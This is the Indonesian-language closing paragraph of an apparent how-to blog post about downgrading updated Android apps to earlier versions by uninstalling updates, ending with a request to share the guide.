Dan ini adalah metode mudah yang dengannya Anda dapat dengan mudah menurunkan versi salah satu aplikasi yang diperbarui pada perangkat Android Anda, meskipun metode ini tidak secara langsung berlaku melalui opsi atau pengaturan Android tetap tidak jauh lebih sulit dari itu. Bangun saja seluruh gagasan tentang metode ini dan kemudian coba di perangkat Anda, Anda dapat dengan mudah menyingkirkan masalah yang dihadapi oleh peningkatan aplikasi karena Anda akan menghapus instalan pembaruan tersebut dan menurunkan versi aplikasi ke versi sebelumnya. Semoga Anda menyukai panduan ini, bagikan juga kepada orang lain.